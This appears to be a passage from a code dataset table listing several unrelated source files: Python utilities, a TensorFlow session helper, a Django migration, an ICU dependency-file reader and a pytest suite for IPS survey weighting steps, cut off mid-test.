index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
996,600 | aef70dd9254cc2f0299e9d9839f4ea58a3b3e567 | #!/usr/bin/env python3
def thousand():
    """Sum every non-negative integer below 1000 that is a multiple of 3 or 5.

    (Project Euler problem 1. Docstring translated from Hungarian.)

    Returns:
        int: the sum, 233168.
    """
    # Generator expression instead of a materialized list: same result,
    # no throwaway intermediate list.
    return sum(x for x in range(1000) if x % 3 == 0 or x % 5 == 0)
def main():
    # Entry point: print the Project Euler #1 answer computed by thousand().
    print(thousand())
if __name__ == "__main__":
main() |
996,601 | 2e24ccb931af1c73693b458ce482344a623d878d | #varsha
import pickle
import matplotlib.pyplot as plt
import os
from collections import OrderedDict
import numpy as np
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.backends.backend_pdf
path = 'C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\' #path to dictionaries folder
subpath = 'C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\' # path to dictionaies folder
#ch
# plots bar graph for tenant vs frequency
def tenant_frequency_plot():
    """Render tenant-vs-frequency bar charts into tenants.pdf.

    Reads a pickled dict (presumably tenant name -> request count; confirm
    against the writer of tenants_Dictionary.txt), plots the first two
    tenants on one page, removes two high-volume services, then plots the
    remaining tenants 30 bars per page plus a final page for the leftovers.
    """
    pdf = matplotlib.backends.backend_pdf.PdfPages("C:\\Users\\supraja\\source\\repos\\DjangoWebProject1\\DjangoWebProject1\\pyt_Files\\pdf_Files\\tenants.pdf")
    # NOTE(review): pickle.loads is unsafe on data that untrusted parties can
    # write -- confirm the provenance of tenants_Dictionary.txt.
    with open(os.path.join(subpath,'tenants_Dictionary' + '.txt'), 'rb') as handle:
        tenantCounts = pickle.loads(handle.read())
    #print(tenantCounts, type(tenantCounts))
    # Page 1: only the first two entries of the dict.
    plt.title("TENANTS FREQUENCY")
    x = np.arange(2)
    plt.xlabel('Tenants')
    plt.ylabel('Frequency')
    #print(tenantCounts.values(), type(tenantCounts.values()))
    plt.bar(x, height = list(tenantCounts.values())[:2])
    plt.xticks(x, list(tenantCounts.keys())[:2])
    plt.xticks(rotation=90)
    #figure = plt.gcf() #saving to pdf
    #figure.set_size_inches(5, 5)
    pdf.savefig(bbox_inches = "tight")
    plt.close()
    # Drop the two dominant services so they do not dwarf the other bars.
    tenantCounts.pop('IONMessagingService', None)
    tenantCounts.pop('ProvisioningService', None)
    # Pages of 30 tenants each.
    # NOTE(review): no plt.close()/new figure inside this loop, so each page
    # appears to accumulate the previous pages' bars -- confirm intended.
    for each in range(1,(len(tenantCounts)//30+1)):
        x = np.arange(30)
        plt.xlabel('Tenants')
        plt.ylabel('Frequency')
        plt.bar(x, height = list(tenantCounts.values())[(each-1)*30:each *30])
        plt.xticks(x, list(tenantCounts.keys())[(each-1)*30:each*30])
        plt.xticks(rotation=90)
        #figure = plt.gcf() #saving to pdf
        #figure.set_size_inches(5, 5)
        pdf.savefig(bbox_inches = "tight")
        #plt.show()
    # Final page: the remaining len(tenantCounts) % 30 tenants.
    rem = len(tenantCounts)%30
    x = np.arange(rem)
    plt.xlabel('Tenants')
    plt.ylabel('Frequency')
    plt.bar(x, height = list(tenantCounts.values())[-rem:])
    plt.xticks(x, list(tenantCounts.keys())[-rem:])
    plt.xticks(rotation=90)
    #figure = plt.gcf() #saving to pdf
    #figure.set_size_inches(5, 5)
    pdf.savefig(bbox_inches = "tight")
    #plt.show()
    pdf.close()
|
996,602 | 4f323c60076efad3bab64d1014bd0b25f1c6de66 | """
@author : Qizhi He @ PNNL (qizhi.he@pnnl.gov)
"""
import tensorflow as tf
def tf_session():
    """Build and return a TensorFlow 1.x session.

    The session allows soft device placement, logs device placement, forces
    GPU-compatible memory, and has all global variables initialized.
    """
    session_config = tf.ConfigProto(allow_soft_placement=True,
                                    log_device_placement=True)
    session_config.gpu_options.force_gpu_compatible = True
    session = tf.Session(config=session_config)
    # Initialize every global variable before handing the session out.
    session.run(tf.global_variables_initializer())
    return session
|
996,603 | 68a3852931be1e7ac61ce78d691375956501c4dd | number1 = int(input("Enter a number: "))
number2 = int(input("Enter a number: "))
number3 = int(input("Enter a number: "))
# Earlier explicit if/else version, kept for reference:
#if number1 > number2 and number2 > number3:
#    print ("True")
#else:
#    print ("False")
# The print below emits the boolean directly: True iff the three
# inputs are strictly decreasing.
print (number1 > number2 and number2 > number3) |
996,604 | 66d603505ac88b8236d37d33097f5c0cbbe2f211 | from abc import ABCMeta, abstractmethod
from typing import List
from app.Dto.AircraftDto import *
from app.Dto.SelectDto import SelectAircraftDto
from app.repositories.AircraftRepository import AircraftRepository
class AircraftManagementService(metaclass=ABCMeta):
    """Abstract service interface for aircraft management operations.

    Implementations are expected to delegate persistence to an
    AircraftRepository (see DefaultAircraftManagementService).
    """
    @abstractmethod
    def register_aircraft(self, model: RegisterAircraftDto):
        """Persist a new aircraft described by *model*."""
        raise NotImplementedError
    @abstractmethod
    def edit_aircraft(self, aircraft_id: int, model: EditAircraftDto):
        """Update the aircraft identified by *aircraft_id* from *model*."""
        raise NotImplementedError
    @abstractmethod
    def list_aircraft(self) -> List[ListAircraftDto]:
        """Return every aircraft as a list of ListAircraftDto."""
        raise NotImplementedError
    @abstractmethod
    def aircraft_details(self, aircraft_id: int) -> AircraftDetailsDto:
        """Return the full details of one aircraft."""
        raise NotImplementedError
    @abstractmethod
    def get_aircraft_list(self) -> List[SelectAircraftDto]:
        # Fixed annotation: ``[SelectAircraftDto]`` was a list literal, not a
        # valid type hint; ``List[SelectAircraftDto]`` is what was meant.
        """Return aircraft formatted for selection widgets."""
        raise NotImplementedError
class DefaultAircraftManagementService(AircraftManagementService):
    """Default AircraftManagementService that forwards every call to an
    injected AircraftRepository."""
    # Repository performing the actual persistence work.
    repository: AircraftRepository
    def __init__(self, repository: AircraftRepository):
        self.repository = repository
    def register_aircraft(self, model: RegisterAircraftDto):
        """Delegate aircraft registration to the repository."""
        return self.repository.register_aircraft(model)
    def edit_aircraft(self, aircraft_id: int, model: EditAircraftDto):
        """Delegate editing of aircraft *aircraft_id* to the repository."""
        return self.repository.edit_aircraft(aircraft_id, model)
    def list_aircraft(self) -> List[ListAircraftDto]:
        """Delegate listing of all aircraft to the repository."""
        return self.repository.list_aircraft()
    def aircraft_details(self, aircraft_id: int) -> AircraftDetailsDto:
        """Delegate the details lookup to the repository."""
        return self.repository.aircraft_details(aircraft_id)
    def delete_aircraft(self, aircraft_id: int):
        # Note: delete_aircraft is not declared on the abstract base class.
        """Delegate deletion of aircraft *aircraft_id* to the repository."""
        return self.repository.delete_aircraft(aircraft_id)
def get_aircraft_list(self) -> [SelectAircraftDto]:
return self.repository.get_aircraft_list() |
996,605 | e73fe66d2ef184264e5df81e61a6bcdfb076d315 | import unittest
import os
from glob import glob
from nose_parameterized import parameterized
from ruamel.yaml import load
import six
from pyacd.parser import parse_acd
ACDTEST_DIR = '/usr/share/EMBOSS/acd'
def get_acds_list():
    """Return one single-element parameter list per *.acd file in ACDTEST_DIR."""
    return [[acd_path] for acd_path in glob(ACDTEST_DIR + '/*.acd')]
class TestParseAcd(unittest.TestCase):
    """Parse every EMBOSS ACD file found on disk and sanity-check the result."""
    @parameterized.expand(get_acds_list())
    def test_parse_command_line(self, acd_path):
        """Parse *acd_path* and check the parsed section count matches the
        number of 'endsection' markers in the raw text."""
        try:
            # Context manager closes the handle; the original leaked it
            # from a bare open().read().
            with open(acd_path, 'r') as acd_file:
                acd_string = acd_file.read()
            acd_object = parse_acd(acd_string)
            # sections count
            self.assertEqual(acd_string.count('endsection'),
                             len(acd_object.desc_sections()))
        except Exception as exc:
            six.print_("Failure parsing ACD file {0}".format(acd_path))
            raise exc
|
996,606 | f977a02ac5fc7677d8097528c2ebdf166af28e99 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2014, International Business Machines
# Corporation and others. All Rights Reserved.
#
# file name: dependencies.py
#
# created on: 2011may26
"""Reader module for dependency data for the ICU dependency tester.
Reads dependencies.txt and makes the data available.
Attributes:
files: Set of "library/filename.o" files mentioned in the dependencies file.
items: Map from library or group names to item maps.
Each item has a "type" ("library" or "group" or "system_symbols").
A library or group item can have an optional set of "files" (as in the files attribute).
Each item can have an optional set of "deps" (libraries & groups).
A group item also has a "library" name unless it is a group of system symbols.
The one "system_symbols" item and its groups have sets of "system_symbols"
with standard-library system symbol names.
libraries: Set of library names mentioned in the dependencies file.
file_to_item: Map from a symbol (ushoe.o) to library or group (shoesize)
"""
__author__ = "Markus W. Scherer"
# TODO: Support binary items.
# .txt syntax: binary: tools/genrb
# item contents: {"type": "binary"} with optional files & deps
# A binary must not be used as a dependency for anything else.
import sys
files = set()
items = {}
libraries = set()
file_to_item = {}
_line_number = 0
_groups_to_be_defined = set()
def _CheckLibraryName(name):
global _line_number
if not name:
sys.exit("Error:%d: \"library: \" without name" % _line_number)
if name.endswith(".o"):
sys.exit("Error:%d: invalid library name %s" % (_line_number, name))
def _CheckGroupName(name):
global _line_number
if not name:
sys.exit("Error:%d: \"group: \" without name" % _line_number)
if "/" in name or name.endswith(".o"):
sys.exit("Error:%d: invalid group name %s" % (_line_number, name))
def _CheckFileName(name):
global _line_number
if "/" in name or not name.endswith(".o"):
sys.exit("Error:%d: invalid file name %s" % (_line_number, name))
def _RemoveComment(line):
    """Strip a trailing '#'-comment and trailing whitespace from *line*.

    Also advances the module-level input line counter.
    """
    global _line_number
    _line_number += 1
    hash_pos = line.find("#")  # Remove trailing comment.
    if hash_pos >= 0:
        line = line[:hash_pos]
    return line.rstrip()  # Remove trailing newlines etc.
def _ReadLine(f):
    """Return the next non-empty line of *f* with comments stripped.

    Raises StopIteration at end of input (callers rely on this).
    """
    while True:
        # Builtin next() instead of f.next(): works on both Python 2.6+
        # and Python 3, where file objects have no .next() method.
        line = _RemoveComment(next(f))
        if line: return line
def _ReadFiles(deps_file, item, library_name):
    """Read indented file-name lines into item["files"].

    Each name is validated, prefixed with "library_name/", and registered in
    the module-level `files` and `file_to_item` maps. A file listed by two
    groups aborts the program. Returns the first non-indented line (the next
    top-level directive).
    """
    global files
    item_files = item.get("files")
    while True:
        line = _ReadLine(deps_file)
        if not line: continue
        if not line.startswith(" "): return line
        # Create the "files" set lazily on the first file line.
        if item_files == None: item_files = item["files"] = set()
        for file_name in line.split():
            _CheckFileName(file_name)
            file_name = library_name + "/" + file_name
            if file_name in files:
                sys.exit("Error:%d: file %s listed in multiple groups" % (_line_number, file_name))
            files.add(file_name)
            item_files.add(file_name)
            # Remember which library/group owns this object file.
            file_to_item[file_name] = item["name"]
def _IsLibrary(item): return item and item["type"] == "library"
def _IsLibraryGroup(item): return item and "library" in item
def _ReadDeps(deps_file, item, library_name):
    """Read indented dependency-name lines into item["deps"].

    A dependency not yet defined is registered as a forward-declared group
    (tracked in `_groups_to_be_defined`) that must be defined later.
    system_symbols items may not depend on libraries or library groups.
    Returns the first non-indented line.
    """
    global items, _line_number, _groups_to_be_defined
    item_deps = item.get("deps")
    while True:
        line = _ReadLine(deps_file)
        if not line: continue
        if not line.startswith(" "): return line
        # Create the "deps" set lazily on the first dependency line.
        if item_deps == None: item_deps = item["deps"] = set()
        for dep in line.split():
            _CheckGroupName(dep)
            dep_item = items.get(dep)
            if item["type"] == "system_symbols" and (_IsLibraryGroup(dep_item) or _IsLibrary(dep_item)):
                sys.exit(("Error:%d: system_symbols depend on previously defined " +
                    "library or library group %s") % (_line_number, dep))
            if dep_item == None:
                # Add this dependency as a new group.
                items[dep] = {"type": "group"}
                if library_name: items[dep]["library"] = library_name
                _groups_to_be_defined.add(dep)
            item_deps.add(dep)
def _AddSystemSymbol(item, symbol):
exports = item.get("system_symbols")
if exports == None: exports = item["system_symbols"] = set()
exports.add(symbol)
def _ReadSystemSymbols(deps_file, item):
    """Read indented system-symbol lines into item["system_symbols"].

    A double-quoted line contributes one symbol (which may contain spaces);
    any other line is split on whitespace into multiple symbols. Returns the
    first non-indented line.
    """
    global _line_number
    while True:
        line = _ReadLine(deps_file)
        if not line: continue
        if not line.startswith(" "): return line
        line = line.lstrip()
        if '"' in line:
            # One double-quote-enclosed symbol on the line, allows spaces in a symbol name.
            symbol = line[1:-1]
            if line.startswith('"') and line.endswith('"') and '"' not in symbol:
                _AddSystemSymbol(item, symbol)
            else:
                sys.exit("Error:%d: invalid quoted symbol name %s" % (_line_number, line))
        else:
            # One or more space-separate symbols.
            for symbol in line.split(): _AddSystemSymbol(item, symbol)
def Load():
    """Reads "dependencies.txt" and populates the module attributes.

    Dispatches on each top-level directive ("library: ", "group: ",
    " deps", "system_symbols:") and hands the file iterator to the
    corresponding _Read* helper, which returns the next directive line.
    Exits the process on any syntax or consistency error.
    """
    global items, libraries, _line_number, _groups_to_be_defined
    deps_file = open("dependencies.txt")
    try:
        line = None
        current_type = None
        while True:
            # NOTE(review): .next() is Python 2 only; Python 3 requires
            # next(deps_file) -- confirm the targeted interpreter.
            while not line: line = _RemoveComment(deps_file.next())
            if line.startswith("library: "):
                current_type = "library"
                name = line[9:].lstrip()
                _CheckLibraryName(name)
                if name in items:
                    sys.exit("Error:%d: library definition using duplicate name %s" % (_line_number, name))
                libraries.add(name)
                item = items[name] = {"type": "library", "name": name}
                line = _ReadFiles(deps_file, item, name)
            elif line.startswith("group: "):
                current_type = "group"
                name = line[7:].lstrip()
                _CheckGroupName(name)
                # A group must have been forward-declared as a dependency.
                if name not in items:
                    sys.exit("Error:%d: group %s defined before mentioned as a dependency" %
                        (_line_number, name))
                if name not in _groups_to_be_defined:
                    sys.exit("Error:%d: group definition using duplicate name %s" % (_line_number, name))
                _groups_to_be_defined.remove(name)
                item = items[name]
                item["name"] = name
                library_name = item.get("library")
                # Library groups list files; system-symbol groups list symbols.
                if library_name:
                    line = _ReadFiles(deps_file, item, library_name)
                else:
                    line = _ReadSystemSymbols(deps_file, item)
            elif line == " deps":
                if current_type == "library":
                    line = _ReadDeps(deps_file, items[name], name)
                elif current_type == "group":
                    item = items[name]
                    line = _ReadDeps(deps_file, item, item.get("library"))
                elif current_type == "system_symbols":
                    item = items[current_type]
                    line = _ReadDeps(deps_file, item, None)
                else:
                    sys.exit("Error:%d: deps before any library or group" % _line_number)
            elif line == "system_symbols:":
                current_type = "system_symbols"
                if current_type in items:
                    sys.exit("Error:%d: duplicate entry for system_symbols" % _line_number)
                item = items[current_type] = {"type": current_type, "name": current_type}
                line = _ReadSystemSymbols(deps_file, item)
            else:
                sys.exit("Syntax error:%d: %s" % (_line_number, line))
    except StopIteration:
        # Normal end of input: the line readers raise StopIteration at EOF.
        pass
    if _groups_to_be_defined:
        sys.exit("Error: some groups mentioned in dependencies are undefined: %s" % _groups_to_be_defined)
|
996,607 | 41cf51bc638c11e8acccb02ccf8191aaaeedc0ef | # Generated by Django 3.1.5 on 2021-01-17 18:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1.5 (see header); creates the Sentence and
    # Correction models. Avoid hand-editing once this migration is applied.
    initial = True
    dependencies = [
        ('vocabulary', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Sentence',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sentence', models.CharField(max_length=500)),
                ('vocab', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='vocabulary.studiedvocable')),
            ],
        ),
        migrations.CreateModel(
            name='Correction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('note', models.CharField(max_length=500)),
                ('sentence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exercises.sentence')),
            ],
        ),
    ]
|
996,608 | 9b141ccb469e289f82a7f89eb4683665b966b13a | import json
import os
import pytest
import time
import numpy as np
import pandas as pd
from pandas.util.testing import assert_frame_equal
import ips.steps.air_miles
import ips.steps.final_weight
import ips.steps.imbalance_weight
import ips.steps.minimums_weight
import ips.steps.non_response_weight
import ips.steps.rail_imputation
import ips.steps.regional_weights
import ips.steps.shift_weight
import ips.steps.spend_imputation
import ips.steps.stay_imputation
import ips.steps.town_stay_expenditure
import ips.steps.traffic_weight
import ips.steps.unsampled_weight
from ips.utils import common_functions as cf
from tests import common_testing_functions as ctf
from ips.db import data_management as idm
with open(r'data/steps_configuration.json') as config_file:
STEP_CONFIGURATION = json.load(config_file)
RUN_ID = 'test-main'
PV_RUN_ID = 'TEMPLATE'
TEST_DATA_DIR = r'tests\data\main\dec'
SURVEY_DATA_FILENAME = 'surveydata_out_expected.csv'
SUMMARY_DATA_FILENAME = 'summary_out_expected.csv'
START_TIME = time.time()
print("Module level start time: {}".format(START_TIME))
@pytest.fixture(scope='module')
def database_connection():
    '''
    This fixture provides the database connection. It is added to the function argument of each test
    and picked up by the test from there. The fixture allows us to re-use the same database connection
    over and over again.
    '''
    # NOTE(review): setup_module() below also calls this fixture function
    # directly, which modern pytest rejects -- confirm the pinned pytest version.
    return cf.get_sql_connection()
def setup_module(module):
    """ setup any state specific to the execution of the given module."""
    # Import data to database
    import_data_dir = r'tests\data\import_data\dec'
    ctf.import_test_data_into_database(import_data_dir, RUN_ID)
    # populates test data within pv table
    # NOTE(review): calling the pytest fixture directly works only on old
    # pytest versions -- confirm before upgrading pytest.
    conn = database_connection()
    ctf.populate_test_pv_table(conn, RUN_ID, PV_RUN_ID)
def teardown_module(module):
    """ teardown any state that was previously setup with a setup_module
    method.

    Deletes every row tagged with this module's RUN_ID from the survey
    subsample table and the per-step data tables, then reports elapsed time.
    """
    cf.delete_from_table(idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', '=', RUN_ID)
    # List of tables to cleanse where [RUN_ID] = RUN_ID
    tables_to_cleanse = ['[dbo].[PROCESS_VARIABLE_PY]',
                         '[dbo].[PROCESS_VARIABLE_TESTING]',
                         '[dbo].[TRAFFIC_DATA]',
                         '[dbo].[SHIFT_DATA]',
                         '[dbo].[NON_RESPONSE_DATA]',
                         '[dbo].[UNSAMPLED_OOH_DATA]',
                         idm.SURVEY_SUBSAMPLE_TABLE]
    # Try to delete from each table in list where condition. If exception occurs,
    # assume table is already empty, and continue deleting from tables in list.
    # (Deliberate best-effort cleanup: a failed delete must not mask results.)
    for table in tables_to_cleanse:
        try:
            cf.delete_from_table(table, 'RUN_ID', '=', RUN_ID)
        except Exception:
            continue
    print("Duration: {}".format(time.strftime("%H:%M:%S", time.gmtime(time.time() - START_TIME))))
def test_shift_weight_step():
    """Run the shift-weight step and compare its survey and summary output
    against the expected CSV baselines."""
    # # Assign variables
    conn = database_connection()
    step_name = "SHIFT_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Shift Weight step
    ips.steps.shift_weight.shift_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: align row order and index before comparing.
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.replace('None', np.nan, inplace=True)
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(
        ['SHIFT_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'AM_PM_NIGHT_PV', 'MIGSI', 'POSS_SHIFT_CROSS',
         'SAMP_SHIFT_CROSS', 'MIN_SH_WT', 'MEAN_SH_WT', 'MAX_SH_WT', 'COUNT_RESPS', 'SUM_SH_WT'])
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(
        ['SHIFT_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'AM_PM_NIGHT_PV', 'MIGSI', 'POSS_SHIFT_CROSS',
         'SAMP_SHIFT_CROSS', 'MIN_SH_WT', 'MEAN_SH_WT', 'MAX_SH_WT', 'COUNT_RESPS', 'SUM_SH_WT'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_non_response_weight_steps():
    """Run the non-response-weight step and compare its survey and summary
    output against the expected CSV baselines."""
    # # Assign variables
    conn = database_connection()
    step_name = "NON_RESPONSE"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Non Response Weight step
    ips.steps.non_response_weight.non_response_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: coerce the group column to numeric so both
    # frames compare on the same dtype.
    actual_results = actual_results.sort_values('SERIAL')
    actual_results['NR_PORT_GRP_PV'] = pd.to_numeric(actual_results['NR_PORT_GRP_PV'], errors='coerce')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results['NR_PORT_GRP_PV'] = pd.to_numeric(expected_results['NR_PORT_GRP_PV'], errors='coerce')
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(
        ['NR_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'MEAN_RESPS_SH_WT', 'COUNT_RESPS', 'PRIOR_SUM',
         'GROSS_RESP', 'GNR', 'MEAN_NR_WT'])
    actual_results['NR_PORT_GRP_PV'] = pd.to_numeric(actual_results['NR_PORT_GRP_PV'], errors='coerce')
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(
        ['NR_PORT_GRP_PV', 'ARRIVEDEPART', 'WEEKDAY_END_PV', 'MEAN_RESPS_SH_WT', 'COUNT_RESPS', 'PRIOR_SUM',
         'GROSS_RESP', 'GNR', 'MEAN_NR_WT'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results['NR_PORT_GRP_PV'] = pd.to_numeric(expected_results['NR_PORT_GRP_PV'], errors='coerce')
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_minimums_weight_step():
    """Run the minimums-weight step and compare its survey and summary output
    against the expected CSV baselines."""
    # # Assign variables
    conn = database_connection()
    step_name = "MINIMUMS_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Minimums Weight step
    ips.steps.minimums_weight.minimums_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery
    actual_results['MINS_PORT_GRP_PV'] = pd.to_numeric(actual_results['MINS_PORT_GRP_PV'], errors='coerce')
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(
        ['MINS_PORT_GRP_PV', 'ARRIVEDEPART', 'MINS_CTRY_GRP_PV', 'MINS_NAT_GRP_PV', 'MINS_CTRY_PORT_GRP_PV',
         'MINS_CASES', 'FULLS_CASES', 'PRIOR_GROSS_MINS', 'PRIOR_GROSS_FULLS', 'PRIOR_GROSS_ALL', 'MINS_WT', 'POST_SUM',
         'CASES_CARRIED_FWD'])
    actual_results['MINS_PORT_GRP_PV'] = pd.to_numeric(actual_results['MINS_PORT_GRP_PV'], errors='coerce')
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(
        ['MINS_PORT_GRP_PV', 'ARRIVEDEPART', 'MINS_CTRY_GRP_PV', 'MINS_NAT_GRP_PV', 'MINS_CTRY_PORT_GRP_PV',
         'MINS_CASES', 'FULLS_CASES', 'PRIOR_GROSS_MINS', 'PRIOR_GROSS_FULLS', 'PRIOR_GROSS_ALL', 'MINS_WT', 'POST_SUM',
         'CASES_CARRIED_FWD'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results['MINS_PORT_GRP_PV'] = pd.to_numeric(expected_results['MINS_PORT_GRP_PV'], errors='coerce')
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
def test_traffic_weight_step():
    """Run the traffic-weight step and compare its survey and summary output
    against the expected CSV baselines."""
    # # Assign variables
    conn = database_connection()
    step_name = "TRAFFIC_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Traffic Weight step
    ips.steps.traffic_weight.traffic_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    actual_results = cf.select_data(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.replace('None', np.nan, inplace=True)
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
    # Get results of Summary Data and compare
    actual_results = cf.select_data('*', STEP_CONFIGURATION[step_name]['ps_table'], 'RUN_ID', RUN_ID)
    expected_results = pd.read_csv(summary_file, engine='python')
    # Formatting and fudgery
    actual_results = actual_results.sort_values(
        ['SAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'CASES', 'TRAFFICTOTAL', 'SUM_TRAFFIC_WT', 'TRAFFIC_WT'])
    actual_results.index = range(0, len(actual_results))
    expected_results = expected_results.sort_values(
        ['SAMP_PORT_GRP_PV', 'ARRIVEDEPART', 'CASES', 'TRAFFICTOTAL', 'SUM_TRAFFIC_WT', 'TRAFFIC_WT'])
    expected_results['RUN_ID'] = RUN_ID
    expected_results.index = range(0, len(expected_results))
    assert_frame_equal(actual_results, expected_results, check_dtype=False)
@pytest.mark.xfail
def test_unsampled_weight_step():
    """Run the unsampled-weight step and compare its survey and summary output
    against the expected CSV baselines (marked xfail: known mismatch)."""
    # Assign variables
    conn = database_connection()
    step_name = "UNSAMPLED_WEIGHT"
    dir_path = os.path.join(TEST_DATA_DIR, step_name.lower())
    survey_file = os.path.join(dir_path, SURVEY_DATA_FILENAME)
    summary_file = os.path.join(dir_path, SUMMARY_DATA_FILENAME)
    # Run Unsampled Weight step
    ips.steps.unsampled_weight.unsampled_weight_step(RUN_ID, conn)
    # Get results of Survey Data and compare
    sql_cols = " , ".join(STEP_CONFIGURATION[step_name]['nullify_pvs'])
    sql_cols = "[SERIAL], " + sql_cols
    # Get results of Survey Data and compare
    sql = """
    SELECT {}
    FROM {}
    WHERE RUN_ID = '{}'
    AND [SERIAL] not like '9999%'
    AND [RESPNSE] between 1 and 2
    """.format(sql_cols, idm.SURVEY_SUBSAMPLE_TABLE, RUN_ID)
    actual_results = pd.read_sql_query(sql, conn)
    expected_results = pd.read_csv(survey_file, engine='python')
    # Formatting and fudgery: coerce the region group to float for comparison.
    actual_results = actual_results.sort_values('SERIAL')
    actual_results.fillna(value=np.nan, inplace=True)
    actual_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(actual_results['UNSAMP_REGION_GRP_PV'],
                                                           errors='coerce',
                                                           downcast='float')
    actual_results.index = range(0, len(actual_results))
    expected_results.columns = expected_results.columns.str.upper()
    expected_results = expected_results.sort_values('SERIAL')
    expected_results.fillna(value=np.nan, inplace=True)
    expected_results['UNSAMP_REGION_GRP_PV'] = pd.to_numeric(expected_results['UNSAMP_REGION_GRP_PV'],
                                                             errors='coerce',
